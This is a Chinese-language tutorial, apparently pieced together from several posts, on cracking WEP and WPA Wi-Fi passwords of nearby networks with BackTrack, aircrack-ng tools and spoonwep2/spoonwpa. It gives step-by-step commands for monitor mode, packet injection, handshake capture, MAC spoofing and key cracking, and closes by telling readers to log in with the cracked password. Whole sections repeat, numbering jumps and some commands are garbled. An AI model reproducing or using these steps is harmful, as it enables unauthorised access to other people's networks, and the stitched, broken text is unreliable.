Bt4破解教程
bt4破解教程
一、准备篇
1、一个有可破解无线信号的环境。如我在家随便搜索出来的信号。
2、带无线网卡的电脑一台(笔记本台式机均可,只要无线网卡兼容BT3),我用的是三星NC10的上网本。
3、2G以上优盘一个(我用的是kingston 8G 的)
4、搜索下载BT3,约800兆。或BT4,约900兆。
BT3下载地址:https://www.360docs.net/doc/464231167.html,/BACKTRACK3final_usb.rar
BT4 下载地址:http://ftp.belnet.be/mirror/backtrack/bt4-beta.iso
注:BT3 全称BackTrack3,与我们常说的bt下载是完全不同的概念。以我理解就是集成了一些计算机安全软件的linux系统。正是由于它的出世和不断普及,使得破解可让普通用户轻易言之。
5、搜索下载spoonwep2中文包。地址:
https://www.360docs.net/doc/464231167.html,:8080/servlet/FileDownload?filename=//yinghu/上传分享/2008/11/13/中文包_spoonwep2.rar&vid=0
注:spoonwep2就是我们的破解软件,一个非常强悍的图形化破解WEP无线网络密码的工具。
二、安装篇
1、将优盘格式化,配置如下图,唯一要注意文件系统选为FAT32就可以了。
2、将刚才下载完成的bt3解压缩,复制到优盘,完成后会看到优盘目录下有两个文件夹,一个boot 一个BT3。如下图:
3、开始安装bt3系统。
点击开始-运行,输入CMD, 然后回车,进入命令行模式。
首先输入你优盘的盘符,我这里是h盘,输入h:然后回车,接下来输入cd boot 回车,进入到boot文件夹下,最后bootinst.bat 回车,就会开始安装BT3,如下图:
然后安装会出现一个提示画面,我们别去管它,直接按任意键继续
按任意键后,电脑会自动设置引导记录,整个过程大概10秒左右。出现下面画面后,此优盘就可以引导系统进去bt3了。
4、集成spoonwep2软件。
首先把我们先前下载的spoonwep2解压缩,里面是六个扩展名为lzm的文件,将这六个文件复制到优盘\bt3\modules文件夹下,如图:
这样我们的bt3系统已经集成安装完毕了,可以动手破解了。
三破解篇
1、将安装好系统的优盘插入电脑,重启后进入bios,设置优盘为电脑第一启动顺序。(这个如果没设置过,可以问一下其他人,或者在网上找找设置方法,每台电脑进入bios的方法也不同,如开机按F2,Del,F1等等)
2、设置优盘启动后,电脑会自动带入我们进入bt3操作系统(如果出现界面选择,你要选择vesa mode),系统界面是这样的(漂亮吧):
开始输入指令
ifconfig -a 查看网卡(之后只出现eth0和lo则表示你的无线网卡没有被识别,要是有eth0、wlan、lo等则表示可以)
如果出现wlan网卡(本机无线网卡),则进行
ifconfig -a wlan0 up(此命令用于加载网卡,有的时候直接执行spoonwep是不可以的,需要加载)
然后执行ln -fs bash/bin/sh
再执行ls -all /bin/sh(显示bash为成功,显示dash为失败)
现在开始破解
1.在shell窗口中输入ifconfig 命令,出现如下信息:
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:(......)Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
2.找出你的无线网卡名字,我这里是eth1.再启动你的网卡为Moniter模式(输入airmon-ng start eth1 11)。再输入ifconfig 命令,返回如下信息:
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
3. 输入命令airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.
命令中的11 表示要破解的频道号,bssid后面的数字表示破解目标的MAC物理地址,outputs 表示要生成的包的名称。回车运行。
4.再开一个shell 输入aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h
00:A1:C1:D8:A5:B6 eth1
其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2前面已解释过是指目标MAC物理地址,00:A1:C1:D8:A5:B6表示本机网卡MAC物理地址
5.再开一个shell 输入aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
获取更多的数据包。
6.返回数据量到1万的时候就可以破解了。再开一个shell输入aircrack-ng -z -b
00:1A:01:8D:C3:B2 outputs.cap 进行破解。如果破解不成功,让它继续抓包,直到破解。
3、启动spoonwep2软件
开启一个命令窗口,输入:spoonwep 回车后10秒钟左右弹出spoonwep2程序:
NET CARD 网卡接口选择WLAN0 DRIVER 驱动选择NORMAL
MODE 模式选择UNKNOWN VICTIM
点NEXT 转到VICTIMS DISCOVERY 窗口
CHAN HOPPING 是全频段扫描(建议选择:FIXED CHAN,有针对性的扫描)
点击右上角LAUNCH 按钮(点完后会变成ABORT ) 这时会弹出抓包窗口,可作为参考,也可不用理会。20秒
首先点击左上角下拉菜单选择CHAN HOPPING→LAUNCH(点完后会变成ABORT )→会开始自动执行
注:
ESSID 路由广播名称
MAC 路由的地址
CHAN 使用的频道
POW 信号强度
DATA 数据包
CLIS 空白代表无客户端,打钩则代表有客户端;
(备注:无线网卡搜索一阵子,被搜索到的无线信号的SSID将会列表显示。如果某加密无线信号的CLIS方框内有“勾”,表示该无线信号此刻托有客户端,这时破解会高效、快速一些。如果你选中了这样的的信号,紧接着窗口的下方会显示出客户端代表,你应该把下方的客户端也选中1想参与破解。不要迷信一定要带客户端才能破解,没有客户端的AP也可以破解,里路上POW 值大于18的都可以破解的。)
有客户端模式比无客户端模式成功率要高,选中打算破解的路由,下面会显示出当前所有链接到这个路由的客户端,选择一个POWER PACKETS都比较高的客户端。
然后点SELECTION OK 转到ATTACK PANEL 窗口
第一个下拉菜单有4个选项,后面3个都可作为无客户端攻击模式,其中:
ARP REPLAY ATTACK (有客户端时用)
P0841 REPLAY ATTACK (次次选)
CHOPCHOP & FORGEATTACK (次选)
FRAGMENTATION & FORGE ATTACK (首选)
第二个下拉菜单有3个选项,其中:
??? LENGTH (不指定加密位数,首选)
128 BITS LENGTH (指定128位加密,次次选)
64 BITS LENGTH (指定64位加密,次选)
两个下拉菜单右边的Inj Rate 是每秒发包数量,选默认的600即可。
选择好两个下拉菜单,点击左边LAUNCH 按钮开始自动破解,破解速度和信号强度成正比。
最下面的WEP KEY就是破解出来的密码,无需输入冒号。
注:有客户端模式比无客户端成功率要高。
注:破解WPA加密时,输入命令为spoonwpa,其他操作步骤不变(但一定需要有客户端连接才能破解)
BT4破解教程
一、spoonwep- wpa破解工具用于BT4下的deb安装包
迅雷下载地址:(已经修正下载地址,打开迅雷,然后复制以下地址即
可)thunder://QUFodHRwOi8vbX kueHd0b3AuY29tL2ZpbGVteS8yMDA5MDUxNy82NzljMTNk Mi4xLmRlYlpa
二、运行unetbootin制作BT4的U盘启动系统。
点确定就开始制作了。
在这里需要泡杯茶点支烟等一下。
从ISO文件里提取文件拷贝到U盘里需要一段时间。
完成之后,不要重启,再把刚刚下到的“spoonwep-wpa破解工具用于BT4下的deb安装包”手动拷贝到U盘根目录下面,自己记好它好的名字,方便到BT4下找到它。
三、启动BT4
在BIOS里面设置从U盘启动,这个无法截图,自己摸索吧。呵呵~~
四、进入BT4
登陆的用户名:root,密码:toor
startx命令启动图形化界面。
五、安装spoonwep-wpa-rc3.deb包
点击左下角的开始菜单,点击一个叫system mune的弹出菜单,再点击“storeage media”,会打开一个窗口,点击窗口上面有个刷新的按钮,在窗口下面空白的地方会列出你的硬盘和外设,进入U盘,找到刚才放入的spoonwep- wpa-rc3.deb,把这个文件复制到BT4的桌面(其实就是/root),可以直接拖到桌面,打开命令行窗口
运行“dpkg -i spoonwep-wpa-rc3.deb”
稍等几秒中,桌面上出现desktop的文件夹,里面就有了spoonwep2+spoonwpa,好了,大功告成,直接单击图标就能运行spoonwep2或spoonwpa了。
也可以输入以下命令执行:
spoonwep2 执行:
spoonwep2
spoonwpa 执行:
spoonwpa
六、开始破解!!!!
1、打开一个SHELL,
输入ifconfig -a
2、可以输入macchange -m 00:11:22:33:44:55 wlan0 来改变本机的MAC地址,
3、输入airmon-ng start wlan0 6
4、输入aireplay-ng -9 mon0
5、加载网卡输入ifconfig -a wlan0 up
6、输入ln -fs bash/bin/sh
7、输入ls -al /bin/sh(这个命令可以显示是否设置成功,显示bash为成功,dash为失败) 【spoonwep2 破解法】
输入spoonwep2回车后就会弹出spoonwep2的窗口。
点击SPOONWEP SETTINGS,在NET CARD里选WLAN0,在DRIVER里选NORMAL,在MODE里选UNKNOW N VICTIM,再点击NEXT、点击LAUNCH进入搜索,然后关闭spoonwep2再开一下,点击SPOONWEP SETTINGS,在NET CARD里选MON0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索后就可以看见好多网卡啦,选定1个网卡点击SELECTION OK,选定PO841 REPLAY ATTACK(这里有4条命令选择),点击LAUNCH后就等待密码的出来(sata数据包到30000个左右)。
【spoonwpa 破解法】
输入spoonwpa回车后就会弹出spoonwpa的窗口。
在NET CARD里选WLAN0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索,然后关闭spoonwpa再开一下,点击SPOONWEP SETTINGS,在NET CARD里选MON0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索后就可以看见好多网卡啦,选定1个必须有客户端的网卡点击SELECTION OK, 再点击LAUNCH AUTOMATED HANDSHAKE CAPTURE,如抓到握手包,请点击金色锁开始破解,这完全靠运气了。
七、用你破解出来的密码去登陆吧
https://www.360docs.net/doc/464231167.html,/blogger/post_show.asp?BlogID=2446622&PostID=20778253
从硬盘启动BT3和BT4破解教程https://www.360docs.net/doc/464231167.html,/s/blog_5ee22a410100fjo8.html
BT4中文版(集成spoonwep2/spoonwpa)下载地址
https://www.360docs.net/doc/464231167.html,/zh-cn/files/bff1b980-66e6-11de-a445-0019d11a795f/
https://www.360docs.net/doc/464231167.html,/zh-cn/files/82ef1823-66d3-11de-a60d-0019d11a795f/
https://www.360docs.net/doc/464231167.html,/zh-cn/files/69667f23-66b9-11de-94dd-0014221b798a/
全功能版本的BT3(dvd版集成各种驱动spoonwep
https://www.360docs.net/doc/464231167.html,/zh-cn/files/cf44a345-2755-11de-a577-0019d11a795f/
BackTrack4 (BT4)最终版(2010年1月11日版
https://www.360docs.net/doc/464231167.html,/s/blog_568be75b0100gu3h.html?k=bt4&t=utf-8
3 完成以上的步骤后就开始破解啦
启动建好的虚拟机,加载BT3,注意如果找不到卡王的话,就“虚拟机-可移动设备-USB设备
-Realtak可移动设备”
接着就是正式破解了,打开一个shell输入命令有2种(2选一)
(1) Airodump-ng –w 1 wlan0
(2)airodump-ng --ivs -w 123 -c 6 wlan0
回车,开始抓包,出现下图这样的是抓包成功
小强解释抓包的数据:
a.BSSID 下面所对应的是你要攻击破解的路由AP的MAC地址。(要拿笔纸抄下)
b.PWR 值PWR值代表信号强度。值越高越好。一般高于30就可以很容易的破解。
此处优先选择值高者破解
c.DATA 数据包。下面所对应的AP(路由)如果有数值(不为0)就说明有客户端。
有客户端者优先破解。为0者先放弃。当然如果在破解时,此值为0.也可以破解。只是时间会长点。
且成功率降低。
d.ESSID 此务必记住,此为AP(路由的名字)
e.以上请一一对应记好
f.请务必选择cipher下为wep的破解。如是wap或非wep者则放弃非wep者目前仍未有好的方法破解。
很明显,你要破的是哪一个吧?用第一个来做示范!
00:14:78:8B:F3:44
打开第二个shell,输入命令spoonwep
回车后会自动出现一个新窗口
在第一行中输入你选择的那个BSSID(刚刚小强叫抄的哦) NET CARD 选择WLANO
Inj rate 可以移动到1000
LAUNCH 选择PO841这个
接着点击LAUNCH,就等着密码出来吧
这个比较快,大概就三分钟的样子WEP KEY:6471686474(密码就是红色那个去掉2个数字之间的冒号)
最佳答案
一、既然有系统了,
1.一个U盘启动制作工具就行:unetbootin-windows-356
下载地址:https://www.360docs.net/doc/464231167.html,/blog/attachments/month_0906/t2009621225526.rar
2.spoonwep-wpa破解工具用于BT4下的deb安装包
迅雷下载地址:(已经修正下载地址,打开迅雷,然后复制以下地址即
可)thunder://QUFodHRwOi8vbXkueHd0b3AuY29tL2ZpbGVteS8yMDA5MDUxNy82NzljM TNkMi4xLmRlYlpa
二、运行unetbootin制作BT4的U盘启动系统。
点确定就开始制作了。
在这里需要泡杯茶点支烟等一下。
从ISO文件里提取文件拷贝到U盘里需要一段时间。
完成之后,不要重启,再把刚刚下到的“spoonwep-wpa破解工具用于BT4下的deb安装包”手动拷贝到U盘根目录下面,自己记好它好的名字,方便到BT4下找到它。
三、启动BT4
在BIOS里面设置从U盘启动,这个无法截图,自己摸索吧。呵呵~~
四、进入BT4
登陆的用户名:root,密码:toor
startx命令启动图形化界面。
五、安装spoonwep-wpa-rc3.deb包
点击左下角的开始菜单,点击一个叫system mune的弹出菜单,再点击“storeage media”,会打开一个窗口,点击窗口上面有个刷新的按钮,在窗口下面空白的地方会列出你的硬盘和外设,进入U盘,找到刚才放入的spoonwep-wpa-rc3.deb,把这个文件复制到BT4的桌面(其实就是/root),可以直接拖到桌面,打开命令行窗口
运行“dpkg -i spoonwep-wpa-rc3.deb”
稍等几秒中,桌面上出现desktop的文件夹,里面就有了spoonwep2+spoonwpa,好了,大功告成,直接单击图标就能运行spoonwep2或spoonwpa了。
也可以输入以下命令执行:
spoonwep2 执行:
spoonwep2
spoonwpa 执行:
spoonwpa
六、开始破解!!!!
【spoonwep2 破解法】
输入spoonwep2回车后就会弹出spoonwep2的窗口。
点击SPOONWEP SETTINGS,在NET CARD里选WLAN0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索,然后关闭spoonwep2再开一下,点击SPOONWEP SETTINGS,在NET CARD里选MON0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH 进入搜索后就可以看见好多网卡啦,选定1个网卡点击SELECTION OK,选定PO841 REPLAY ATTACK(这里有4条命令选择),点击LAUNCH后就等待密码的出来(sata数据包到30000个左右)。
【spoonwpa 破解法】
输入spoonwpa回车后就会弹出spoonwpa的窗口。
在NET CARD里选WLAN0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索,然后关闭spoonwpa再开一下,点击SPOONWEP SETTINGS,在NET CARD里选MON0,在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索后就可以看见好多网卡啦,选定1个必须有客户端的网卡点击SELECTION OK, 再点击LAUNCH AUTOMATED HANDSHAKE CAPTURE,如抓到握手包,请点击金色锁开始破解,这完全靠运气了。
七、用你破解出来的密码去登陆吧
150
2 安装虚拟机,见下图
点新建虚拟机
典型安装
选择LINUX,注意版本选择other linux 2.6.x kernel!
按下一步是提示虚拟主机名字和要安装的位置(自定)
选择使用网络地址翻译
下一步完成
点击绿色按钮启动